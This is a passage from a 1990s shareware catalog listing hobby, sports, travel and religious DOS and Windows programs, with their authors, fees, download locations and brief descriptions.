hobby" 641 + + + + Product: TROOP TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 4.0 (06-18-94) + Needs: IBM PC, DOS 3.0 or better. 500k RAM; Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: TRTR40.ZIP on BBSs; TRTR40.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 318k (about 24 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + TROOP TRACKER is a menu driven program which stores valuable + information on a Troop and presents that information in various + reports of use to the Troop. Generates Scout, Scouter, Patrol & + former Member Rosters, Labels, Advancement Report, Individual + Record, Troop Advancement Profile, Individual Advancment + Evalua- tion, Individual OA Eligibility Evaluation, Troop + Attendance Statistics using Meetings, Activities, and Service + Projects. Written & used by serving Scoutmaster. + + + 15.23 Self development + + Product: ASTRO + Astrology program. See full description on page 592. + + Product: ASTRO For Windows + Astrology program. See full description on page 593. + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 251. + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 595. + + Product: NUMERO UNO + Numerology program. See full description on page 596. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 514. + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 517. + + Chapter 15, "Home & hobby" 642 + + + + 15.24 Sports + + See also: Home & hobby, Hunting & fishing. + + 15.24.1 Betting pools + + See also: Home & hobby, Gambling. + st + Product: 1 &goal Fantasy Football + Runs a fantasy football league. See full description on + page 651. + + Product: FastBreak Fantasy Basketball + Complete fantasy basketball program. See full description on + page 648. + + Product: Keyboard Coach Fantasy Football + Head-to-head fantasy football. See full description on + page 651. + + Product: LineDrive Fantasy Baseball + Complete fantasy baseball package. See full description on + page 647. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 651. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL Games. See full description + on page 652. + + 15.24.2 Handicapping + + See also: Home & hobby, Gambling. + + Chapter 15, "Home & hobby" 643 + + + + 15.24.2.1 For `the ponies' + + Product: Thoroughbred Handicapper Pro + Author: Whirlwind Technologies + Version: 2.1 (06-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; CGA monitor; + Hard disk. + Strongly recommended: Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; discounts on upgrades. + Look for: availability unknown on BBSs. + SWREG#: 1668 + PsL#: 11045 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A complete thoroughbred horserace handicapping system! + Powerful, yet easy to use, it incorporates a combination of + commonly used handicapping techniques to calculate the point + score and suggested wagering odds for each horse. Provides + reports for handicapping & wagers. Includes ability to track + all wagers; prints reports to screen & printer; choice of basic + or advanced handicapping; thorough on-screen help system; on- + disk user's manual; more. + + + Product: TURF.v93 + Author: Second Career Software + Version: 1.01 (05-14-94) + Needs: IBM PC, DOS 2.0 or better. 300k RAM. ANSI.SYS or + equivalent. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime mail support; 1-month limited + return policy; bonus utilities. + Look for: TURF9311.ZIP on BBSs. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A powerful and highly advanced, highly sophisticated, yet easy- + to-use, thoroughbred race handicapping system. It combines + sound, well-established race handicapping principles with + scientific statistical analysis methodology, applied to years' + worth of actual race data, to create a handicapping tool which + can be used at race tracks, from Belmont Park to the county + fair, at OTB or anywhere thoroughbreds are racing and a Daily + Racing Form or similar publication is available. + + Chapter 15, "Home & hobby" 644 + + + + 15.24.2.2 For other + + Product: Golfhcap + Calculates handicaps using USGA Slope System. See full + description on page 653. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 651. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL Games. See full description + on page 652. + + 15.24.3 Baseball/softball + + Product: Diamond Data + Author: The Software Construction Co., 508-851-6204 + Version: 4.6 (07-30-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, + newsletter, mail support; 1-month return policy; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: DDATA_46.ZIP on BBSs (call 508-454-3864 to download it + at no charge); DDATA.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 9 (or contact userID 70313,3615 for assistance); + DDATA_46.ZIP on GEnie in SPORTS forum LIBrary 1 (or contact + userID W.GEISER for assistance). + SWREG#: 2063 + PsL#: 10653 + Download size: 111k (about eight minutes with a 2400 baud modem) + Description: + Manipulate data for your league or team. 34 different + statistics are kept for each player. 9 more for each game + played. Databases can be merged to allow league totals, + lifetime stats, season totals, etc. depending on what info is + stored in each DB. Great for helping generate that batting + order or awards for your team/league banquet! A report + generation facility allows sorting and filtering (exclude + players below a threshold) by any statistic and can output to a + file, disk, or printer. + + Chapter 15, "Home & hobby" 645 + + + + Product: League Manager + Author: Al Dodd Software Co., 813-683-4210 + Version: 1.90 (04-16-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $45.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, newsletter, mail support; bonus utilities; all + ASP-wide offers (see page 6). 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + A serious program that will handle just about any kind of + amateur sports league for youth. Multiple databases track each + division, team, player, adult, and sponsor. Handles custom + registration forms, rosters and mailing labels. Numerous + reports. Online help, user friendly, menu driven interface, + easy to use Support for over 150+ printers. Includes player + stats for baseball/softball. Team rosters approved by Little + League, Babe Ruth, and Dixie Youth (others in approval + process). + + + Product: LineDrive Fantasy Baseball + Author: McS Custom Software, 707-725-6016 + Version: 6.13 (02-18-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 6); disks + of other shareware; discounts on other products. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; LD613.ZIP on CompuServe + in CIS:LIBRARY forum LIBrary 0. + Download size: 334k (about 25 minutes with a 2400 baud modem) + Description: + Runs a fantasy baseball league for up to 15 teams. Standings + may be based on your choice of any or all of up to 12 + statistics. Compatable with USA Today Sports Center download + files (Automatic update utility included). + + Chapter 15, "Home & hobby" 646 + + + + Product: StatTrak for Baseball + Author: ALL-PRO Software Inc., 608-271-1586 + Version: 5.3 (01-15-95) + Needs: IBM PC, DOS 3.2 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Registration fee: $39.95 (add $3.75 for shipping to U.S. + addresses) (add $3.75 for shipping to Canadian addresses) (add + $3.75 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + mail support; lifetime return policy; discounts on other + products; discounts on upgrades. + Look for: APSSB53.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Baseball/softball statistics management system for league, + tournament, or individual teams. Tracks batting, pitching, + fielding, game scores, team record, and team standings. Any + StatTrak report can be computed for any combination of games + (all games, league games, last 5 games, games 2-4-7, etc). Sort + on over 70 categories and even name your own additional + categories. Display and print reports or create report disk + files. Menu-driven and very easy to use. + + + 15.24.4 Basketball + + Product: Basketball Statistics + Author: Gentle Productions, 616-861-5157 + Version: 1.0 (11-05-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support. 6-month + return policy. + Look for: availability unknown on BBSs. + Download size: 273k (about 21 minutes with a 2400 baud modem) + Description: + Complete, easy to use basketball statistics program. Features + include a modern user interface with quick drop-down menus and + dialog boxes, four different report generation categories (team + single game, season games, season players, season single + player), custom report generation, custom performance rating + formulas, the ability to view reports on the screen, print + them, or save them to a file, and context-sensitive help. + + Chapter 15, "Home & hobby" 647 + + + + Product: FastBreak Fantasy Basketball + Author: McS Custom Software, 707-725-6016 + Version: 3.08 (02-18-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 + Registration benefits: lifetime unlimited mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 6); disks + of other shareware; discounts on other products. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; FB308.ZIP on CompuServe + in CIS:LIBRARY forum LIBrary 0. + Download size: 268k (about 20 minutes with a 2400 baud modem) + Description: + Runs a Fantasy or Rotissiere basketball league for up to 15 + teams. Automatic update utility allows updating using download + files from the USA Today Sports Center. + + + Product: League Manager + Manages any youth sports organization. See full description on + page 644. + + 15.24.5 Boating sports + + Product: Bass Class + Bass fishing game & tutorial. See full description on + page 618. + + Product: BassDuel + One- or two-player fishing game. See full description on + page 619. + + Product: BassTips + Over 100 boating & fishing tips. See full description on + page 619. + + Product: BassTour + Bass fishing tournament game. See full description on + page 620. + + Chapter 15, "Home & hobby" 648 + + + + Product: Marnav + Author: C & E Associates + Version: 2.2 (01-15-94) + Needs: IBM PC, DOS 2.0 or better. 70k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 1-month limited + return policy; bonus data; all ASP-wide offers (see page 6). + Look for: MARNAV22.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A program to convert GPS (Lat/Lon) coordinates to LORAN Delays + and vice versa. Also calculates heading and distance from point + A to point B with point coordinates specified in either GPS or + LORAN coordinates. It also performs time/speed/distance + calculations and provides optional hard copy of all operations + for trip planning. An editor allows the addition of LORAN data. + + + 15.24.6 Firearms + + See also: Home & hobby, Scouting; Home & hobby, Hunting & + fishing. + + Product: QBALL + Author: Benjamin W. Hartley + Version: 2.40 (06-01-94) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. Dot matrix printer. + Strongly recommended: EGA monitor; Hard disk; Epson printer. + Registration fee: $25.00 (add $7.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; discounts on other products; + discounts on upgrades. Lifetime free upgrading allowed. 1 + free update disk(s) sent out. + Look for: QBALL240.ZIP on BBSs (call 718-837-3236 to download it + at no charge); QBAL24.ZIP on CompuServe in CIS:OUTDOOR forum + LIBrary 14 (or contact userID 70033,2612 for assistance); + QBALL240.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID B.HARTLEY1 for assistance). + Download size: 366k (about 27 minutes with a 2400 baud modem) + Description: + Compute: trajectory data, remaining velocity and energy, wind + deflection, time of flight, ballistic coefficients, slant fire + & crosswind corrections, point blank range, gun free recoil, + muzzle velocity (2 methods). Display 15 trajectories at once. + Tables output as hardcopy/save to file. User configurable + + Chapter 15, "Home & hobby" 649 + + + + display & defaults. Utilities: translate graphics, read range + tables, install; reformat documentation; modify bullet lookup + data. On-disk user's manual. + + + 15.24.7 Football + st + Product: 1 &goal Fantasy Football + Author: McS Custom Software, 707-725-6016 + Version: 3.07 (01-31-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; 1ST37.ZIP on CompuServe + in CIS:CIS forum LIBrary 0. + Download size: 226k (about 17 minutes with a 2400 baud modem) + Description: + Runs a fantasy football league for up to 15 teams based on your + choice of any or all of 12 statistics. Compatable with US Today + Sports Center download files. + + + Product: Keyboard Coach Fantasy Football + Author: McS Custom Software, 707-725-6016 + Version: 1.03 (01-08-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; KCB103.ZIP on CompuServe + in CIS:CIS forum LIBrary 0. + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + Runs a fantasy football league for 4 to 12 teams. Competition + is head-to-head and league standings are based on games won/ + lost. Games played based on actual NFL players stats in 12 + categories. + + + Product: League Manager + Manages any youth sports organization. See full description on + page 644. + + Chapter 15, "Home & hobby" 650 + + + + Product: NFL Forecaster for DOS + Author: 100% Cotton Software, 717-289-4019 + Version: 2.0d (08-15-94) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $20.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; bonus data; all ASP- + wide offers (see page 6); discounts on other products; + discounts on upgrades. Discount coupon for annual update disk; + rebate for teachers. + Look for: ODNFL20.ZIP on BBSs. + PsL#: 11343 + Download size: 254k (about 19 minutes with a 2400 baud modem) + Description: + Using ONLY scores, this program ranks each team & predicts + winners & spreads of NFL games. The user is guided step-by-step + through the process of entering scores, forecasting spreads, + saving data, viewing rankings & printing reports. Requires only + 10 minutes per week. Prints 5 reports and the schedule; 6 view + windows; sorts 8 ways. Handles playoff & non-scheduled games. + Highly configurable. Saves each week's rankings, scores & + spreads. Function for creating new season's schedule. Accurate. + + + Product: NFL Forecaster for Windows + Author: 100% Cotton Software, 717-289-4019 + Version: 3.0w (06-01-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; bonus data; discounts + on other products; discounts on upgrades. Discount coupon for + annual update disk; rebate for teachers. + Look for: FCAST30W.ZIP on BBSs. + PsL#: 11343 + Download size: 304k (about 23 minutes with a 2400 baud modem) + Description: + Using ONLY scores, this program ranks each team & predicts + winners & spreads of NFL games. The user is guided step-by-step + through the process of entering scores, forecasting spreads, + saving data, viewing rankings & printing reports. Requires only + 10 minutes per week. Prints 5 reports & the schedule; 6 view + windows; sorts 8 ways. Handles playoff & non-scheduled games. + Highly configurable. Saves each week's rankings, scores & + spreads. Function for creating new season's schedule. Accurate. + + Chapter 15, "Home & hobby" 651 + + + + 15.24.8 Golf + + Product: Golf Tournament Scorekeeper + Author: Home Alone Software, 403-425-4404 + Version: 1.2 (07-04-94) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, GEnie, + mail support; bonus utilities; all ASP-wide offers (see + page 6). + Look for: GOLFTS12.ZIP on BBSs; GOLFTS.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 9 (or contact userID 75240,243 for + assistance); GOLFTS12.ZIP on GEnie in SPORTS forum LIBrary 12 + (or contact userID B.LANE4 for assistance). + SWREG#: 1978 + Download size: 183k (about 14 minutes with a 2400 baud modem) + Description: + Calculates gross and net scores with a choice of handicapping + methods. Outputs a sorted leader board to screen or printer. + Allows up to 10 separate flights and team play including best + ball scoring. Provides a handicap for the unhandicapped using + the Callaway system. Has a Callaway hidden holes option and + many comprehensive reports. Reduces time spent caculating + standings from hours to minutes. + + + Product: Golfhcap + Author: C & E Associates + Version: 3.4 (01-15-94) + Needs: IBM PC, DOS 2.0 or better. 150k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 1-month limited + return policy; all ASP-wide offers (see page 6). + Look for: GLFHCP34.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Not only calculates golfer's handicaps using the USGA Slope + system but also prints membership lists, mailing labels, score + input forms, handicap index cards as well as a monthly report + showing scores used, old and new handicap indexes for each + golfer. Also provides a printout of the handicapping data for + any single golfer to help resolve any problems. Will handle up + to 12 groups of golfers with each group having up to 500 + golfers. + + Chapter 15, "Home & hobby" 652 + + + + 15.24.9 Martial arts + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 595. + + 15.24.10 Soccer/rugby + + Product: League Manager + Manages any youth sports organization. See full description on + page 644. + + 15.24.11 Other + + Product: AeroChart + Exercise charting and motivation program. See full description + on page 614. + + Product: ALL-PRO League Scheduler + Author: ALL-PRO Software Inc., 608-271-1586 + Version: 1.1 (01-17-95) + Needs: IBM PC, DOS 3.2 or better. 640k RAM; CGA monitor; Hard + disk; Mouse. + Registration fee: $49.95 (add $3.75 for shipping to U.S. + addresses) (add $3.75 for shipping to Canadian addresses) (add + $3.75 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + lifetime return policy; discounts on upgrades. + Look for: APSLS11.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Schedules games for any number of leagues, 40 teams per league, + at any number of locations. Handles division play, tracks + scores, and creates standings. Lets you customize and edit the + schedule. Displays and prints reports. Mouse support, menu- + driven and very easy to use! + + + Product: Book-It + Membership and activity booking system. See full description + on page 365. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 571. + + Product: Me & My Metabolism + Effects of lifestyle on your energy balance. See full + description on page 543. + + Product: Race The Nags + Horse racing game in animated graphics. See full description + on page 599. + + Chapter 15, "Home & hobby" 653 + + + + Product: SwimBase + Author: Words to Go, 301-855-6427 + Version: 2.04 (07-15-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Registration fee: $49.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, mail support. + Look for: SWIMDB20.ZIP on BBSs; SWIMDB.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 9 (or contact userID 76515,1510 for + assistance). + Download size: 302k (about 23 minutes with a 2400 baud modem) + Description: + An easy to use, menu driven program to keep all the data + required for a swim team. The swimmers' personal data is stored + along with all event, meet and season results. Team rosters, + address lists, swimmer results, event results and meet results + are some of the reports that can be prepared. All event names, + event numbers, event scoring and age groups are user-definable. + Swim meet management functions are also included. Can be user + configured to support USS, NF or USMS teams. + + + 15.25 Travel + + Product: National INNdex + Author: Nelson's Computer Services, 708-965-7325 + Version: 5.05 (05-01-95) + Needs: IBM PC, DOS 3.3 or better. 400k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 1-month + return policy; bonus data. 6-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: NATINN.ZIP on BBSs; NATINN.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 17 (or contact userID 70274,1772 for + assistance). + SWREG#: 4536 + PsL#: 11770 + Download size: 252k (about 19 minutes with a 2400 baud modem) + Description: + At last! Help for the road warrior or vacationing family. This + motel locator will find a motel in almost any town in the USA + of several thousand or more population. Simply select the + state and town you plan to visit, and National INNdex displays + or prints an attractive list of motels complete with national + chain affiliation, location, phone numbers and basic amenities. + Includes 2,200+ motels. + + Chapter 15, "Home & hobby" 654 + + + + 15.26 Software tools & add-ins + + 15.26.1 For other + + Product: DISASTER + Interactive Disassembler 8086, 286, 386, V20. See full + description on page 455. + + + 15.27 Other + + Product: RR + Author: Feico Nater Shareware, 31-74-438373 + Version: 1.0 (01-01-92) + Needs: IBM PC, DOS 2.0 or better. VGA monitor, mouse. + Registration fee: $10.00 + Registration benefits: Phone/mail support, free upgrades. + Look for: RR.* on BBSs; RR.* on GEnie in 0 forum LIBrary 0. + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Draw a railroad pattern on the screen and watch trains ride + without colliding. + + Chapter 16, "Religion & philosophy" 655 + + + + + + Chapter 16 + Religion & philosophy + + See also: Home & hobby, Fortune telling & astrology. + + + 16.1 The Bible + + Product: New Testament for Windows + Author: Rocky Mountain Laboratories, 303-679-1662 + Version: 1.61 (04-04-94) + Needs: IBM AT (80286), Windows 3.0 or better. 2000k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $14.95 (add $2.00 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; + 3-month limited return policy; bonus utilities; discounts on + other products. + Look for: availability unknown on BBSs; NT4W16.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 75540,600 + for assistance). + SWREG#: 2485 + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Features the complete King James text of the New Testament in + an intuitive, easy-to-use, 3D graphical user interface. It + includes powerful text search software, color maps, timeline, + personal notes linked to the corresponding Scripture, tutorial, + context-sensitive help, and study-aids with topical hypertext + links to events, parables and miracles in the life of Christ. + Over 40,000 copies in use. + + Chapter 16, "Religion & philosophy" 656 + + + + 16.1.1 Bible programs + + Product: Bible Timeline + Author: Cascoly Software, 206-523-6135 + Version: 2.14 (03-01-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. + Look for: availability unknown on BBSs; BTL.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 11 (or contact userID 76703,3046 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + How old was Abraham when Jacob was born? Who were the Kings + of Israel and Judah when the Iliad was written? What Biblical + leaders were alive when the first Olympic games were held? This + lets you sort and selects individual people and events, or + groups and factions, to develop new insights and trace patterns + across different eras and cultures. You can modify or expand + any of the datasets. Useful for sermon research, Bible, + history and art students, teachers, + + + Product: SUNDAY SCHOOL COLORS + A coloring game for children. See full description on + page 510. + + + 16.2 For houses of worship + + See also: Database applications. + + Chapter 16, "Religion & philosophy" 657 + + + + Product: CMTS (Church Mbr. Tracking Sys) + Author: Torbert Data Systems, Inc., 804-488-5506 + Version: 3.3 (10-01-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $389.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of tollfree 800# phone, fax, BBS, + CompuServe, mail support; royalty-free runtime license; site + license; discounts on other products; discounts on upgrades. + Look for: CMTS33A.ZIP on BBSs (multiple files) (call 804-488-4146 + to download it at no charge); CMTSA.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 10 (multiple files) (or contact userID + 73747,2336 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Winner of Public Brand Software's 12th annual contest - + applications, this is the church management system that does it + all. Membership, donations, fund accounting, attendance, + visitation, event tracking and an optional report writer round + out this fully integrated system. One of the best church + management systems available, competing with commercial church + systems in the $2000-$5000 price range. + + + Product: ProDev*MEMBER Church System + Author: Pro Dev Software, 616-788-2243 + Version: 3.0g (01-16-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Hard disk. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; discounts on upgrades. + Look for: PDMEMB3G.ZIP on BBSs. + Download size: 478k (about 36 minutes with a 2400 baud modem) + Description: + Tracks address, children, attendance, giving, jobs, talents and + any information for anyone walking in the church door. Allows + fast posting of giving and attendance. Unlimited text notes + window per member with search features. Many reports, + statements, labels and rotary file card runs with very flexible + filtering. F1 Help. + + Chapter 16, "Religion & philosophy" 658 + + + + Product: RANGER TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 2.0 (07-08-94) + Needs: IBM PC, DOS 3.0 or better. 510k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime tollfree 800# phone, fax, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades. + 1 free update disk(s) sent out. + Look for: RRTR20.ZIP on BBSs; RRTR20.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 0 (or contact userID 100014,2347 for + assistance). + Download size: 327k (about 25 minutes with a 2400 baud modem) + Description: + A menu-driven program which stores information on the Youth and + Adults of an Outpost. Will generate Ranger and Commander + rosters as well as a roster of former members, mailing labels, + an individual record for each Ranger or Commander, and an + attendance summary for all Rangers. Trackes Advancement, + Advanced Merits earned, Outpost and/or Patrol offices served, + and all training received. + + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 682. + + Product: SUNDAY SCHOOL COLORS + A coloring game for children. See full description on + page 510. + + + 16.3 New age/occult + + Product: ASTRO + Astrology program. See full description on page 592. + + Product: ASTRO For Windows + Astrology program. See full description on page 593. + + Product: By the Numbers [***] + Personality analysis with Numerology. See full description on + page 594. + + Product: ESPTEST + Parapsychology tool. See full description on page 542. + + Chapter 16, "Religion & philosophy" 659 + + + + Product: Fortune Teller [***] + Seven ways to tell fortunes, plus ESP test. See full + description on page 595. + + Product: Geomancy [***] + Author: R.K. West Consulting + Version: 4.7 (05-19-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: GEO47.ZIP on BBSs; GEO.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + This is an ancient system of divination, sometimes associated + with black magic. Originally based on stones tossed in a + circle, modern Geomancy uses your selection of dot patterns to + create an Astro-Geomantic chart and answer your questions. + Provides an explanation of Geomantic figures. Readings can be + saved, edited, printed. + + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 595. + + Product: Mayan Calendar [***] + Converts Mayan/modern calendar dates. See full description on + page 596. + + Product: NUMERO UNO + Numerology program. See full description on page 596. + + Product: Personal Tarot [***] + Fortune telling with Tarot cards. See full description on + page 597. + + Product: Wynter Stone's I Ching [***] + I CHING fortunes and philosophy. See full description on + page 598. + + Product: Wynter Stone's Quick Guide [***] + Mini-encyclopedia of mystical information. See full + description on page 598. + + Product: Your ESP Test [***] + Find out if you have psychic powers! See full description on + page 598. + + Chapter 16, "Religion & philosophy" 660 + + + + 16.4 Philosophy + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 595. + + Product: THE MAGIC OF THE MIND + Author: Donald E.J. Field + Version: 1.0 (10-13-93) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Dual 720k floppy drives; Hard disk. + Registration fee: A:$10.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of BBS, mail support; all ASP-wide + offers (see page 6). + Look for: BOOK.ZIP on BBSs. + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + An absorbing and contentious new evaluation of the + peculiarities and diversities of human behavior, presented as a + non-assertive but philosophical awakening to reality. Any + person who reads this book must become an even better person. + Suitable for adolescents and adults alike. Don't miss out on + this dynamic and facinating reading experience. + + + 16.4.1 Metaphysics + + Product: ASTRO + Astrology program. See full description on page 592. + + Product: ASTRO For Windows + Astrology program. See full description on page 593. + + Product: By the Numbers [***] + Personality analysis with Numerology. See full description on + page 594. + + Product: ESPTEST + Parapsychology tool. See 